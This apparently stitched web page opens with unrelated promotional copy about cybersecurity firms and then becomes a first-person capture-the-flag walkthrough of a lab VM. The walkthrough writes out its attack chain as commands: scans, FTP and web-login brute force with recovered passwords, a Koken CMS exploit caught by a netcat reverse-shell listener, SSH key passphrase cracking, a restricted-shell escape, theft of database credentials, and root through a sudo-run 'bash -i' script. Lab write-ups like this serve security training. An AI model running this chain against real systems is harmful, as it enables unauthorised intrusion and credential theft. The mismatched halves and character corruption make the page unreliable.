Welcome to our video discussing the journey to success for cybersecurity firms! In this video, we dive into the steps and strategies that top-level organizations can take to stay proactive in cybersecurity measures.
As cyber threats continue to evolve, cybersecurity firms play a crucial role in protecting businesses from potential attacks. By understanding the unique challenges that organizations face, cybersecurity firms can tailor their solutions to effectively address these issues.
Join us as we explore the various aspects of becoming a successful cybersecurity firm, from developing cutting-edge technologies to implementing robust security measures. We will also discuss the importance of staying ahead of the curve in the ever-changing landscape of cybersecurity.
Whether you are a seasoned professional in the cybersecurity industry or a top-level organization seeking protection, this video provides valuable insights to help you navigate the road to success in the cybersecurity sector.
Don’t miss out on the latest trends and strategies for cybersecurity firm success โ hit the subscribe button and stay tuned for more informative content!
Identify the target machine
Firstly, I identified the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Next, I scanned open ports on the target machine so that I would get the knowledge of the exposed services.
nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.63
Here, we see three web services and one FTP service. Likewise, we also see a filtered port 22.
Enumerate port 80
The default page didnโt give me anything.
However, the source contained a base64 encoded text at the end of the page.
The decoded text gave us morse code which we can decode using Cyber Chef.
Here, we got the first flag.
Bruteforce directory
For the next flag, I enumerated the directory on port 80.
gobuster dir -u http://10.0.2.63 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir-80.log
I found a path that had a Wireshark packet capture file and a text file.
And, I also downloaded the capture file. From the note above, the one who smells like death refers to Creed. Similarly, it also says that he has a weak password. Upon opening the capture file, we see the FTP password of the user creed.
But it didnโt allow me to log in. Meanwhile, we get another path in the gobuster scan.
On that path, we see a document.
The document has the third flag (ours second). Also, the document says that Creed has added a three-digit number at the end of the password. So, I wrote a python script to create a wordlist.
with open("wordlist.txt", "w") as file:
for i in range(1000):
file.write(f"creed{i:03}\n")
After I ran the python script, I got a wordlist โwordlist.txtโ as follows.
Then, I did the bruteforce once again.
hydra -l creed -P wordlist.txt 10.0.2.63 ftp
lftp -u creed,creed223 10.0.2.63
On the reminder file, we see a hint for the next step. Upon searching the internet for a reference with the same line, we redirect to season 7 episode 9. And, there is a reference to the password which I have snipped below.
So, the password of the zip is โbigboobzโ.
The files had a note and an encrypted SSH private key.
Here, the note said that the private key belongs to angela and the passphrase is one of her catsโ names. I checked the names from the link below.
https://theoffice.fandom.com/wiki/Angela%27s_cats
However, we saw in the Nmap scan results that the SSH port is filtered. Therefore, we have to unlock the port. In most of the case, we see the use of the binary knock for this purpose.
Enumerate port 18888
On the website, we see a reference to angela once again. Next, I scanned the directories.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.0.2.63:18888/FUZZ" -of html -o dir-18888.html -fs 0
On the admin page, we see a login form as follows.
I fired up burp suite for bruteforcing the password. Since we know the email is โangela@dundermifflin.comโ, and the password is one of her cats, we can use Burp Suite intruder. In the intruder, I set the position as follows.
And, I manually added the catsโ names from the fandom page.
Lastly, I started the attack.
The cat Crinklepuss redirected and the length is different from others. So, we got the password.
The settings of the Koken CMS revealed the version of it. This version suffers from the following exploit.
https://www.exploit-db.com/exploits/48706
I followed the instructions to get the reverse shell. I listened on port 9001.
nc -nlvp 9001
Finally, I got access to a shell.
Next, I improved the shell using the following link.
Upgrade to an intelligent reverse shell
Unlock the filtered port
On the /var/www/html directory, there is a hint directory.
Inside the directory, we have an index.html file.
It asked us to find the difference between the images. Thus, I downloaded the images to my machine.
wget http://10.0.2.63/_hint_/knockknock1.jpg
wget http://10.0.2.63/_hint_/knockknock2.jpg
wget http://10.0.2.63/_hint_/knockknock3.jpg
After I downloaded the images, I looked at the exiftags of all images. Luckily, I got something on the second image.
exiftool knockknock2.jpg
Using the numbers 5000, 7000 and 9000, we can unlock the ssh port.
knock 10.0.2.63 5000 7000 9000
After doing the above command, I ran Nmap scan on port 22.
nmap -v -T4 -sC -sV -p22 10.0.2.63
Getting SSH shell access
Previously, we had found an encrypted SSH private key named michael. So, we can guess that that belongs to the same user. Thus, I moved forward to cracking the passphrase of it. Also, I had downloaded ssh2john.py for python3 into the home directory of my machine.
python3 ~/ssh2john.py michael | tee michael-hash
Next, I cracked the hash using the file โrockyou.txtโ.
john michael-hash --wordlist=/home/kali/rockyou.txt
It gave us the passphrase. So, I changed the permissions of the private key and logged into the SSH service.
chmod 600 michael
ssh michael@10.0.2.63 -i michael
The shell is a restricted bash. So, I overcame the restrictions as follows.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We got the next flag on the directory.
Find unexplored flags
On the /var/www/html2/secret directory, we got one missed flag.
When I checked the sudo permissions, I found out that the user can execute some scripts as all users.
sudo -l
But before this, letโs get another flag that is situated in MySQL server.
cat /var/www/koken/storage/configuration/database.php
Using these configurations, we can log into the database server.
mysql -ukokenuser -p -D kokendb
That table contained our fifth flag. So, we got all of the first 7 flags. Since we only have one flag left, we can proceed towards root privilege escalation.
Coming back to the sudo permissions, we donโt see any files inside creedโs home directory starting with โdefuseโ.
However, we can log into the FTP server using creedโs credentials and try executing it as root. I created a file โdefuse.shโ on my local machine with the following content.
#!/bin/bash
bash -i
However, I couldnโt make it executable. So, I checked the permissions on the configuration file /etc/vsftpd.conf.
Since itโs editable by everyone, we can enable the chmod command.
Now, we have to restart the service which we donโt have access to. Therefore, I had to restart the virtual machine. Next, I had to unlock the service once again. Similarly, I had to log in as michael and overcome the restricted bash.
And, I didnโt get any errors while changing the permissions in the FTP client.
Then, I executed the script as the user root.
sudo -u root /home/creed/defuse.sh
Finally, I got the last flag.
Leave a Reply